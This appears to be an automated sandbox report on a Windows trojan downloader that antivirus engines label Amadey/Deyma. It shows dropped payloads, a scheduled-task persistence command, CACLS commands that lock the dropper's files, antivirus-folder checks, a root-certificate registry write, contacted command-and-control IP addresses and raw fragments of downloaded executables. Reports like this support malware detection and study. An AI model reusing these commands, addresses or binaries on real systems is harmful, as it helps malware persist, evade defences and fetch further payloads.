file C:\Users\test22\AppData\Local\Temp\f22b669919\ Install_2.5.7-I602.exe
file C:\Users\test22\AppData\Local\Temp\1000010001\cc.exe
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe" /F
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "test22:N"&&CACLS "legenda.exe" /P "test22:R" /E&&echo Y|CACLS "..\f22b669919" /P "test22:N"&&CACLS "..\f22b669919" /P "test22:R" /E&&Exit
file C:\Users\test22\AppData\Local\Temp\1000005001\Installer.exe
file C:\Users\test22\AppData\Local\Temp\1000010001\cc.exe
file C:\Users\test22\AppData\Local\Temp\1000014001\blueloader.exe
file C:\Users\test22\AppData\Local\Temp\1000015001\download.exe
file C:\Users\test22\AppData\Local\Temp\1000010001\cc.exe
file C:\Users\test22\AppData\Local\Temp\1000014001\blueloader.exe
file C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "legenda.exe" /P "test22:N"&&CACLS "legenda.exe" /P "test22:R" /E&&echo Y|CACLS "..\f22b669919" /P "test22:N"&&CACLS "..\f22b669919" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000005001\Installer.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000005001\Installer.exe
0 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000010001\cc.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000010001\cc.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000014001\blueloader.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000014001\blueloader.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\1000015001\download.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\1000015001\download.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: Install_2.5.7-I602.exe
parameters:
filepath: Install_2.5.7-I602.exe
0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win64 $7PEd† ²éûcð" ÞÜ@ ;ð«E` € @Ðs   0§Œ0´u0À( ±PÀ€.textÀ `.dataø  @À.bss0b@À.idata¦°,@À.didata€À2@À.edatasÐ4@@.tlsàÀ.rdatamð6@@.reloc8@B.pdataÀ L@@.rsrc§Œ0Ž\@@.enigma1À`7ê@à.enigma2à Ðà J:ààn@FalseTrueSystem@@Integer€ÿÿÿ`@Byteÿ€@Wordÿÿ @CardinalÿÿÿÿÀ@Pointerà@ NativeUIntÿÿÿÿÿÿÿÿ@ ShortStringÿ @string8@TClassè @X@HRESULT€ÿÿÿx@TGUID˜@D1x@D2x@D3D4 pR@ &op_Equality@p@Leftp@Right  R@&op_Inequality@p@Leftp@Right ÐS@Emptyp@ àR@Createp@Data@ BigEndian S@Createp@X@Data˜@ AStartIndex@ BigEndianT@IsEmpty@P@PInterfaceEntryp@x@TInterfaceEntry(p@IID¸@VTable8@IOffset˜@_FillerØ@  ImplGetter(@PInterfaceTableH@P@TInterfaceTableˆ8@ EntryCount˜@_FillerEntries@ð @@R@ð^@_@Ðb@Àb@c@c@ c@ðb@P[@€[@`\@ [@°[@À[@%Z@DñÿŒ@Bñÿ¼@Bñÿñ@Cñÿ?@Bñÿz@Bñÿ¯@Cñÿó@Cñÿ<@Cñÿs@Cñÿ¨@Cñÿà@Cñÿ,@Cñÿw@CñÿÂ@Cñÿ@Cñÿi@Bñÿ³@Bñÿý@BñÿW@Cñÿ¥@Cñÿâ@Cñÿ%@Cñÿi@Jòÿ¬@Jóÿã@Jôÿ&@Jõÿ•@JöÿÒ@J÷ÿ@JøÿX@Jùÿ§@KúÿÞ@Jûÿ @MüÿI @Jýÿ~ @Jþÿ³ @JÿÿTObject2Ð[@Create è @Self0\@Freeè @Self5°\@ DisposeOfè @SelfN`]@ InitInstanceè @ Self¸@Instance; ^@CleanupInstanceè @Self5ðY@ ClassType0@è @SelfDZ@ ClassName@ Self@@I[@ ClassNameIs@ Self@Name70[@ ClassParent0@Self5Z@ ClassInfo¸@Self8@[@ InstanceSize8@SelfL b@ InheritsFrom@ Self0@AClassKc@ MethodAddress¸@ Self@NameK d@ MethodAddress¸@ Self@NameZPd@ MethodName@(Self¸@Address@@M@Z@QualifiedClassName@ Self@@JÐd@ FieldAddress¸@ è @Self@NameJ€e@ FieldAddress¸@ è @Self@NameZ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ’8‰ˆ-Ò-зЈÈÂȜÂÜJx™L.k|)h𒨭6¸Xœ²D˜æ¤äüD«,8vexžà‡p0¼¼‰(yPhÛ ‹ –`nn~'lޖn֕™H*jF?Ðp±T–@Û`‰ðÄ`M4Ð/X’VAзñ¿hV?÷$ÿ®«9IAa’yá$‚·ü¿–’ú’I|:x\nJv6dºÉÂ'xùä•n hrA2ˆéšh$Ù`“Ãöw£‡³—§NX²²¦@¤8áNúØMZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEd† ð."  ÀTdD2p0 ð hÐ   ôe ¤ Ö h.text À `.dataTdàfÆ@À.rdata|µP¶,@@.pdataôe fâ@@.bssD2€ €À.CRTÀ H @À.idataÂÐ J @À.edatahð b @@.reloc¤ "d @BQh>‡$jŸÅ—ÍB«IdEÙMt ‚ø‹œ±‘¹?ì$ô„¬I%'V~„Ž“P¾òÆЎ­ NJ=ËE'ì{ѓäºòÂIF$4QèY–Ô†–ŽO¿ÉÇdÎ_((zx¾|öïh)…¦Nà$nì~ðŽôžø®ü¾üÎüÞüîüþü9¡:.;><N,^Ÿ†–ŽL†”ÕÂèËìØ´ÜEÛ"ÙèÉùѳÝădLÑô“Sîoè-¸¸X”üܘæî®þà<UäeèuÙÙÈÙjL¨È@@•@ZøÐ<‚'ŠˆºåÆÒlò¬Êì*ä6Ïé…•O¥µÏÅÏÕÌåÕ 4¢ѱy쒲„×›ô.hk)mÅXÍ/æŠê£@òh%ˆ¢òJkìX%‡ÎREb“î’ÒšÉðê4l*²ævjKz¢¢‰®`˜ ªrt,Y<Ò=l-t‚ÑÒb#ËÀåàöžð¦ôȕ~)Ñ9ÙIáY,R?­?½?Í?Ý?í%ýA€-ý5,D[ӌƒ&!ȝR[O@¨\@( ‰FÁP‘tY&X"ÏH ps˜Qðúä$K0nÄHÔ,;ìr{–ˆˆ†Àüßüç–|7KLlÙ,Ĥ²`“Ô9’  æ ²£»ÁŽjdڀ”˜I’sŒqhùzdèᒀ¦
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $z‚4ä>ãZ·>ãZ·>ãZ·Q•Ä·0ãZ·Q•ð·bãZ·7›É·7ãZ·>ã[·KãZ·Q•ñ·%ãZ·Q•À·?ãZ·Q•Ç·?ãZ·Rich>ãZ·PEL(jªbà  Ð( {>à@ ¬b€œÕd xåˆ,@¸.textŽÏÐ `.dataÈ* àVÔ@À.rsrcxå æ*@@&Û ÛØ*Ø:ØJØXØjØxؐئؼØÒØäØøØÙ2Ù@ÙNÙbـٖÙô×°Ù¼ÙÐÙîÙÚÚ0Ú<ÚPÚZÚjÚvڊڞڴÚÈ×æצٸ×HÛXÛfÛrÛ~ی۞۴ÛÆÛâÛòÛÜÜÜ*Ü6ÜFÜ\Üt܌ܪܾÜÒÜæÜüÜÝ,ÝFÝX݀ݎݦݲÝÀÝÎÝØÝðÝÞ"Þ2ÞHÞbÞrÞzކޒޜި޺ÞÐÞÜÞìÞþÞß"ß4ß@ßRß`ßp߀ßàÚÒÚìÚ??@hE@E{@Ȍ@Vi@Â@F@Bedowe cukon novPogixucugalNigizuzuja jaguwit sibedacuducato pox juyocokohokukVoyapeyifer hivaco takari yusu sopNigiwiyu seceRusefuf bozedijFer wadamopenobumi bufexixopi zoz winagemecadisHanoc yocecaj dijKatijaw xocuwiyocJefi xabusefuvo wamefipafagos gafifasudagetif nayaYidefafisomo hotecuf gibonekupufu rotipowetalix moriwiTenu joyabakBipovey duzJacefedojatico toguxuforifake ginokin %s %d %f00 %fCorExitProcessmscoree.dllruntime error TLOSS error SING error DOMAIN error R6033 - Attempt to use MSIL code from this assembly during native code initialization This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. R6032 - not enough space for locale information R6031 - Attempt to initialize the CRT more than once. This indicates a bug in your application. R6030 - CRT not initialized R6028 - unable to initialize heap R6027 - not enough space for lowio initialization R6026 - not enough space for stdio initialization R6025 - pure virtual function call R6024 - not enough space for _onexit/atexit table R6019 - unable to open console device R6018 - unexpected heap error R6017 - unexpected multithread lock error R6016 - not enough space for thread data R6010 - abort() has been called R6009 - not enough
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELsÞ òà 0p Â+   @ à @…p+O  tÀ T+  H.text`o p  `.rsrct  r @@.reloc À x @B¤+HT! .s(*.(( *04(trpo ( ,rQp o &*( *0h ”c %Ð( s s s s o o (+(+ Þ,o Ü,o Ü,o Ü *(.H !1R A\ ( *BSJB v4.0.30319lT#~À`#Strings h#USˆ#GUID˜h#BlobW” ú3"Ê:اØn¦ø–PPþPŽPZPsP­P‚¹`¹áPÈÙ'.$.ªÿªEØ.FPP’PÅ.Ø@.. :ª Ý:ín½ø.‚&A™AùA‹AaU3 ™P –5\ #¡h ƒó¨ † ° “i¥L!†      ) 1 9 A I Q Y a i q y ¡ ±Ø±!&‰O,‰z4 Ñ.K‘ S‘ é Y™ añba‘>g=l>‚5. ª.³.Ò.#Û.+Û.3Û.;Û.CÛ.KÛ.SÛ.[Û.cá.k .s£{`”c !@È+€‡´.)9~;~IEnumerable`1WindowsFormsApp16B93183687631EA74C7081ED266BF8C25880C677A13D6A31BD2AE2E9EFFD3545__StaticArrayInitTypeSize=615316<Module><PrivateImplementationDetails>System.IOmscorlibSystem.Collections.GenericLoadCompressionModeEnumerableIDisposableRuntimeFieldHandleValueTypeGetTypeSystem.CoreDisposeReverseCompilerGeneratedAttributeGuidAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeByteblueloader.exeSystem.Runtime.VersioningBlackDreamBufferedStreamGZipStreamMemoryStreamProgramSystemMainSystem.IO.CompressionSystem.ReflectionCopyToGzipSystem.LinqInvokeMemberblueloaderBinderHunter.ctorSystem.DiagnosticsSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesDebuggingModesBindingFlagsRuntimeHelpersCatObjectInitializeArrayToArrayAssemblyop_InequalityODOdUyAvTTkAMSVXV2fb.pMe10YvR6S8XNAhRClaQIHv1ZH53tZ~ÈÛ0oODÄã½~E     YE EEE ]a IIMmq  y} y €…€…  €…·z\V4à‰ TWrapNonExceptionThrows)$795f0e44-0093-41cb-af35-a8a4be7215ec 1.0.0.0G.NETFramework,Version=v4.0TFrameworkDisplayName.NET Framework 4˜+²+ ¤+_CorExeMainmscoree.dllÿ% @‹ì»gX]×0šI½# ½÷>ô^UPÁ†¢¢¢( 6DE© ½÷Þ{ïED Š¢Š` EáÛ3 !>Ï}¿ïóã\ç:Hföìµ×^½ì‰ÌÿýùÿߏÖvðÁŒa­ú›UŒ2åO ŒÏ`Ü0®˜ó˜s'ÌŒ(Æs ãˆ9 FçÁ¯)ÂÐctþ×u0G1˜càÙ9ÌvteG'€íÆæ¿` Œ8: üXOaœÁïŒøEîÁ*pwss ¬rǜÀÇXQ0ž×S€†à¹hW€{À̇ÙOÙÿ<æ$xzå鸞ÃØ¢+\Àx+J‡<€‚Á¯*ø¿Åàï؋„Ïsìn`þû5NŒåÿ#~lÈ| ½®V(;ÿAöÿ)ýU9 rW¥ðM‚¹(E(>  0T°$¾ÿ֑'Xu¬8r·¦#DŠP‰Ÿ¦šãGisºV¥üB ö8xî†ònEÙÏÕÐ9€e FSõtçÑý a04Itþ?1!ºÜƒàÜüýƒEW‘~ŒÑOˆ<‚HË34íèxÀcp:€ÏmຠÈyÀêîö€y œâZpÏÚµÜXþ…“üãƒAeýÃóõàÂþŸÏÿïÏÿ‡~LD1R+èÝ©SǔœÎ¹=sÆõˆõ©SçÜÌÈp¬ ªÿŒ@™3¢ Yd1ŽÇÎ*Ÿrv>ãåuÊÙñˆ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $çø6£n–e£n–e£n–eªe©n–eñ—d¡n–eñ“d²n–eñ’d©n–eñ•d n–e·—d¤n–e£n—e’n–egŸd¢n–egie¢n–eg”d¢n–eRich£n–ePEd†×=dð" üð@@?é` )ÈPuÞ@h*¸!0,#p€#8 ¨.text\  `.rdataè @@.dataH0"@À.pdatah@$@@.rsrcuÞPà&@@.reloc,0@BHƒì8E3ÉHÇD$ L93ÉH`ÿrE3ÉÇD$(LHÇD$ H°3Éÿ03ÀHƒÄ8ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌff„H; ‘uHÁÁf÷ÁÿÿuÃHÁÉéªÌÌ@SHƒì ¹è¾ èã‹Èèè èË‹Øè ¹‰èD„Àtsè? H t èß袋Èè… …ÀuRè¢èá…Àt H ~èa èœè—èj‹ÈèŸ è‚„ÀtèI èPè…ÀuHƒÄ [ùè³ÌÌÌHƒì(èg3ÀHƒÄ(ÃHƒì(è?è‹ÈHƒÄ(éM ÌÌÌH‰\$H‰t$WHƒì0¹è/„À„6@2ö@ˆt$ èÞŠØ‹ $ƒù„#…ÉuJÇï#H8H è® …Àt ¸ÿéÙH÷H àè‡ Ç±#ë@¶@ˆt$ ŠËèèËH‹ØHƒ8tH‹Èèn„ÀtE3ÀAP3ÉH‹ÿ|è§H‹ØHƒ8tH‹ÈèB„ÀtH‹ èT è H‹øè5 H‹è' L‹ÇH‹Ó‹è€ýÿÿ‹ØèÅ„ÀtU@„öuè 3ұ貋Ãë‹Ø裄Àt;€|$ uèó ‹ÃH‹\$@H‹t$HHƒÄ0_ùè#¹è‹Ëè¡ ‹ËèŸ Hƒì(è×HƒÄ(érþÿÿÌÌ@SHƒì H‹Ù3ÉÿC H‹ËÿB ÿ, H‹Èº ÀHƒÄ [Hÿ% H‰L$Hƒì8¹ÿô …Àt¹Í)H ‚è©H‹D$8H‰iHD$8HƒÀH‰ùH‹RH‰ÃH‹D$@H‰Çǝ ÀÇ—Ç¡¸HkÀH ™HǸHkÀH‹ )H‰L ¸HkÀH‹ H‰L H 0èÿþÿÿHƒÄ8ÃÌÌ@SVWHƒì@H‹Ùÿ H‹³ø3ÿE3ÀHT$`H‹Îÿ9 H…Àt9Hƒd$8HL$hH‹T$`L‹ÈH‰L$0L‹ÆHL$pH‰L$(3ÉH‰\$ ÿú ÿǃÿ|±HƒÄ@_^[ÃÌÌÌHƒì(蟅Àt!eH‹%0H‹HëH;Èt3ÀðH± !uî2ÀHƒÄ(ðë÷ÌÌÌ@SHƒì ¶÷ …É»DÈç è¦è½„Àu2Àëè°„Àu 3Éè¥ëêŠÃHƒÄ [ÃÌÌÌ@SHƒì €=¬ ‹Ùugƒùwjè…Àt(…Ûu$H – è“…ÀuH ž 胅Àt.2Àë3foé HƒÈÿóe H‰n ón H‰w ÆA °HƒÄ [ùèfÌÌHƒìL‹Á¸MZf9YêÿÿuxHc ŒêÿÿHIêÿÿHʁ9PEu_¸ f9AuTL+·AHQHзAH €L ÊH‰$I;Ñt‹J L;Ár ‹BÁL;ÀrHƒÂ(ëß3ÒH…Òu2Àëƒz$}2Àë °ë2Àë2ÀHƒÄÃ@SHƒì ŠÙèï3҅Àt „ÛuH‡nHƒÄ [Ã@SHƒì €=cŠÙt„Òu è6ŠËè/°HƒÄ [ÃÌÌÌ@SHƒì Hƒ=>ÿH‹ÙuèBëH‹ÓH (è+3҅ÀHDÓH‹ÂHƒÄ [ÃÌÌHƒì(è»ÿÿÿH÷ØÀ÷ØÿÈHƒÄ(ÃÌH‰\$ UH‹ìHƒì H‹$H»2¢ß-™+H;ÃutHƒeHMÿ H‹EH‰Eÿ ‹ÀH1Eÿ ‹ÀHM H1EÿÔ‹E HMHÁà H3E H3EH3ÁH¹ÿÿÿÿÿÿH#ÁH¹3¢ß-™+H;ÃHDÁH‰¡H‹\$HH÷ÐH‰ŠHƒÄ ]Ã3ÀÃ̸ÃÌ̸@ÃÌÌH iHÿ%zÌÌ°ÃÌÂÌHaÃHaÃHƒì(èçÿÿÿHƒ$èæÿÿÿHƒHƒÄ(ÃÌ3À98”ÀÃHYÃHIÃ%)ÃH‰\$UH¬$@ûÿÿHìÀ‹Ù¹ÿ&…Àt‹ËÍ)¹èÄÿÿÿ3ÒHMðA¸ÐèHMðÿñH‹èH•ØH‹ËE3ÀÿH…Àt<Hƒd$8HàH‹•ØL‹ÈH‰L$0L‹ÃHèH‰L$(HMðH‰L$ 3ÉÿÆH‹…ÈHL$PH‰…è3ÒH…ÈA¸˜HƒÀH‰…ˆè~H‹…ÈH‰D$`ÇD$P@ÇD$TÿƒøHD$PH‰D$@HEð”ÃH‰D$H3ÉÿAHL$@ÿ>…Àu „ÛuHè¾þÿÿH‹œ$ÐHÄÀ]ÃÌé3þÿÿÌÌÌHƒì(3Éÿ°H…Àt:¹MZf9u0HcH<Hȁ9PEu!¸ f9Auƒ¹„v ƒ¹øt°ë2ÀHƒÄ(ÃÌÌH Hÿ%ªÌÌH‰\$WHƒì H‹H‹ù;csmàuƒ{u‹S ‚àúlæƒøvú@™t H‹\$03ÀHƒÄ _ÃèPH‰H‹_èJH‰èÒÌÌH‰\$WHƒì Hû H=ô ëH‹H…Àtÿ„HƒÃH;ßréH‹\$0HƒÄ _ÃH‰\$WHƒì HÏ H=È ëH‹H…ÀtÿHHƒÃH;ßréH‹\$0HƒÄ _ÃH‰\$H‰t$WHƒì3À3É¢D‹ÁE3ÛD‹ËAðntelAñGenuD‹Ò‹ð3ÉACE È¢AòineI‰$E ʉ\$‹ù‰L$‰T$ uPHƒ ;ÿ%ð?ÿ=Àt(=`t!=pt°ùüÿƒø w$H¹H£ÁsD‹AƒÈD‰ëD‹ü¸DHû;ð|&3É¢‰$D‹Û‰\$‰L$‰T$ ºã s E ÁD‰ÉǧD‰ ¤ºçƒ‘D‰ »‰ˆºçsyºçss3ÉÐHÁâ H ÐH‰T$ H‹D$ "Ã:ÃuW‹ZƒÈÇI‰GAöà t8ƒÈ Ç0‰.¸ÐD#ØD;ØuH‹D$
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyá–å~Lyá–â~Ryá–ä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPEL6[ dà! ތ>ð°@ Jœ<K<€øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD` D@À.rsrcø€P@@.relocTR@Bj h¨<¹phè?#hêèŒ*YÃÌÌÌj8hÌ<¹ˆhè#h`êèl*YÃÌÌÌj8hÌ<¹ hèÿ"hÀêèL*YÃÌÌÌj8hÌ<¹¸hèß"h ëè,*YÃÌÌÌj8h=¹Ðhè¿"h€ëè *YÃÌÌÌj0hD=¹èhèŸ"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌh€h°=¹iè\"h ìè©)YÃj?h€>¹0iè?"híèŒ)YÃÌÌ̋ÁÂÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèÂ2ƒÄ‹Æ^]ÂÌÌ̋I¸|<…ÉEÁÃÌÌU‹ìV‹ñFÇ”ñPèó2ƒÄöEt j Vè«%ƒÄ‹Æ^]AÇ”ñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀ‹ÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌU‹ìƒì MôèÒÿÿÿhˆJEôPè›2ÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèò1ƒÄÇìñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPè²1ƒÄÇ ñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹ZVWQS‹ñè‹=€h3É3À‰}ü…Û~53Ò;NjþEЃ=„h¸phCphƒ~r‹>ŠˆA‹}üB;Ë|˃~r‹_Æ‹Æ^[‹å]Ã_Æ‹Æ^[‹å]ÃÌÌÌÌÌU‹ìƒìSVW‹ò‹ùQ‰}ô‹FP‰Eðè“3ۉ]ø9]ðŽ)Dƒ~‹Ær‹¾Pè¯KƒÄ…Àu-‹N‹Æƒùr‹€< t‹Æƒùr‹ƒ‹Ïr‹Šé̃~‹Ær‹‹=@i3ҋ Di…ÿt+ŠˆEÿfDŠ]ÿƒù¸0iC0i8‹]øtB;×ráƒÊÿ‹E‹Èƒxr‹3À…ÿt.Š ˆMÿDƒ=Di¹0iŠ]ÿC 0i8‹]øt@;Çr݃Èÿƒ=Di¹0iC 0i‰Mì‹Mô‰Møƒyr‹ ‰Mø‹Ï+ȍ 3Ò÷÷‹Mì‹}ôŠ ‹MøˆC‰]ø;]ðŒÜþÿÿƒr‹Æ‹Ç_^[‹å]ÃÆ‹Ç_^[‹å]ÃÌÌÌÌÌÌÌÌÌÌU‹ìƒì@SVW‹Ù‹òQMĉ]ôèçýÿÿEċÖPMÜèYþÿÿhÇCÇCÆè°"‹Ø¹ƒÈÿ‰]ø‹ûƒÄ ó«3Ò„¾Š8>‰‹Bƒú@|ð‹Uì3ö3ۍ~ø…ÒtA‹Møƒ}ðEÜCEܾ‹ƒøÿt'ÁæðƒÇx‹Ï‹ÆÓø‹MôPè‹Uìƒï‹MøC;Úr‹Eø…ÀthPèð!ƒÄ‹Uðƒúr(‹MÜB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwVRQèÀ!ƒÄ‹UØÇEìÇEðÆE܃úr(‹MÄB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQè~!ƒÄ‹Eô_^[‹å]Ãè›GÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì4‹E0SVW3ÿÆEè¾…À„‹]ÇEàÇEäÆEÐ;Ç‚´+ǍMÐ;ÃB؃}4E CE SÇPèƒþr.‹MèV‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡hRQè× ƒÄMЃ}Uó~EàEèCUƒ}ä‹uà‹]f~ÉMèCÁfÖEø;óu\ƒîr‹; uƒÀƒÂƒîsïƒþü„îŠ: u7ƒþý„ߊH:Ju&ƒþþ„ΊH:Juƒþÿ„½Š@:B„±‹E0G‹uü;ø‚õþÿÿ3ÿ‹Uƒþr/‹MèF‹Áþr‹IüƒÆ#+ÁƒÀüƒø‡’VQè ‹UƒÄ‹Eƒør'H‹Âùr‹RüƒÁ#+ƒÀüƒøw`QRèσċU4ÇEÇEÆEƒúr3‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwë ‹uüGéWÿÿÿRQ肃ċÇ_^[‹å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹]V‹ñ‰]üWjhÀ>ÇFÇFÆèD3ÿ…Û~1ƒ}ECEŠ8S¿C €ú¶È¶ÃGȶÁ‹ÎPèG;}ü|ϋUƒúr(‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèуÄ_‹Æ^[‹å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì0VWj$hÄ>MÐÇEàÇEäÆEÐè—‹E…Àu3öéÇ3ÿ…À„¸ÇEøÇEüÆEè;Ç‚F+ǹ;ÁBȃ}ECEQǍMèPèBƒìEЋÌPètƒìEè‹ôƒì‹ÌPèa‹ÎèªþÿÿƒÄè¢üÿÿ‹UüƒÄ0…À„šƒúr,‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡¹RQèǃċEG;ø‚Hÿÿÿ¾‹Uäƒúr(‹MÐB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwxRQ膃ċUƒúr^‹MB‹ÁúrF‹IüƒÂ#+ÁƒÀüƒøwHë4ƒúr(‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw#RQè1ƒÄ3öétÿÿÿRQè ƒÄ_‹Æ^‹å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌU‹ìQ‹E‹U‹MV…À„‚S@WPè] ƒÄMƒ}‹Ø‹ÓCM+ъIˆD ÿ„Àuó‹óNŠF„Àuù+ñFVjÿðV‹øSWÿðPèÇ5ƒÄ WÿðjÿñÿñWjÿñÿ ñ‹U‹M_[^ƒúr%B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèAƒÄ‹å]ÃèdBÌÌÌÌU‹ìƒì$SVW‹ùjÇGÇGÆÿñ…À„‡j ÿ$ñ‹Ø‰]ü…Û„lSÿð‰Eô…À„SjjjjjÿPjhéýÿ ð‹ð‰uø…öŽ.‹WN;Êw‰O‹Çƒr‹ÆëF‹G‹Ù+Ú+Â;Øw%ƒ‹Ç‰Or‹S4jVèE,ÆƒÄ ‹uøëQSÆEø‹ÏÿuøS訋]üƒ‹Çr‹jjVPjÿÿuô
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe" /F
host 103.114.163.134
host 179.43.155.247
host 62.204.41.87
host 62.204.41.88
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\test22\AppData\Local\Temp\f22b669919\legenda.exe" /F
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
cmdline cmd /k echo Y|CACLS "legenda.exe" /P "test22:N"&&CACLS "legenda.exe" /P "test22:R" /E&&echo Y|CACLS "..\f22b669919" /P "test22:N"&&CACLS "..\f22b669919" /P "test22:R" /E&&Exit
cmdline CACLS "legenda.exe" /P "test22:R" /E
cmdline CACLS "legenda.exe" /P "test22:N"
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "test22:N"&&CACLS "legenda.exe" /P "test22:R" /E&&echo Y|CACLS "..\f22b669919" /P "test22:N"&&CACLS "..\f22b669919" /P "test22:R" /E&&Exit
cmdline CACLS "..\f22b669919" /P "test22:R" /E
cmdline CACLS "..\f22b669919" /P "test22:N"
MicroWorld-eScan Gen:Variant.Doina.45665
CAT-QuickHeal Trojandownloader.Deyma
ALYac Gen:Variant.Doina.45665
Malwarebytes Trojan.MalPack
VIPRE Gen:Variant.Doina.45665
Sangfor Trojan.Win32.Save.a
Alibaba TrojanDownloader:Win32/Deyma.97085975
CrowdStrike win/malicious_confidence_100% (W)
Arcabit Trojan.Doina.DB261
VirIT Trojan.Win32.Genus.OAG
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
ESET-NOD32 a variant of Win32/TrojanDownloader.Amadey.A
Cynet Malicious (score: 100)
APEX Malicious
Paloalto generic.ml
Kaspersky HEUR:Trojan-Downloader.Win32.Deyma.gen
BitDefender Gen:Variant.Doina.45665
NANO-Antivirus Trojan.Win32.Deyma.jvdhne
Avast Win32:Evo-gen [Trj]
Tencent Win32.Trojan-Downloader.Deyma.Wmhl
Sophos Generic ML PUA (PUA)
